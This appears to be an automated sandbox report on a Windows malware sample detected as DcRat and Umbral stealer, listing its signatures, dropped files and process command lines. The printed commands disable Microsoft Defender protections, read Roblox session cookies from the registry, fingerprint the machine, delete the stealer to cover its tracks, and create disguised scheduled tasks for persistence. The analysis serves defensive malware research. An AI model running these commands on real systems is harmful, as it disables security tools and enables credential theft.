| SHA256 | 7d83e686176e73272f93deb3a961be58d15414f0b24fff41b12a83a2771635b6 |
| SHA512 | 94d418bac88c3e2a15a12a3157fdf5a43b434302a958813af47ffff74dcfdec8695e8566d07292246b43d3a47f2233c6e31deb2345be736a99f906a0ebd9e2b1 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-05 01:28
Reported
2024-05-05 01:30
Platform
win10v2004-20240419-en
Max time kernel
150s
Max time network
143s
Command Line
Signatures
DcRat
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
Umbral
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\stealer.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\чекер dc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | C:\Users\All Users\OfficeClickToRun.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\stealer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\чекер dc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Inject.exe | N/A |
| N/A | N/A | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| N/A | N/A | C:\Users\All Users\OfficeClickToRun.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Internet Explorer\en-US\f3b6ecef712a24 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\6cb0b6c459d5d3 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files (x86)\Windows Photo Viewer\uk-UA\69ddcba757bf72 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files\Microsoft Office 15\ClientX64\eddb19405b7ce1 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\6cb0b6c459d5d3 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files\Internet Explorer\en-US\spoolsv.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files (x86)\Windows Multimedia Platform\56085415360792 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\dwm.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Speech_OneCore\Engines\e6c9b481da804f | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Windows\Migration\WTR\SppExtComObj.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Windows\Migration\WTR\e1ef82546f0b02 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Windows\INF\winlogon.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Windows\INF\cc11b995f2a76d | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\чекер dc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings | C:\Users\All Users\OfficeClickToRun.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\stealer.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
"C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"
C:\Users\Admin\AppData\Local\Temp\stealer.exe
"C:\Users\Admin\AppData\Local\Temp\stealer.exe"
C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"
C:\Users\Admin\AppData\Local\Temp\Inject.exe
"C:\Users\Admin\AppData\Local\Temp\Inject.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "
C:\MsWinsessiondllNet\driverBrokercommon.exe
"C:\MsWinsessiondllNet\driverBrokercommon.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealer.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\MsWinsessiondllNet\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\MsWinsessiondllNet\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
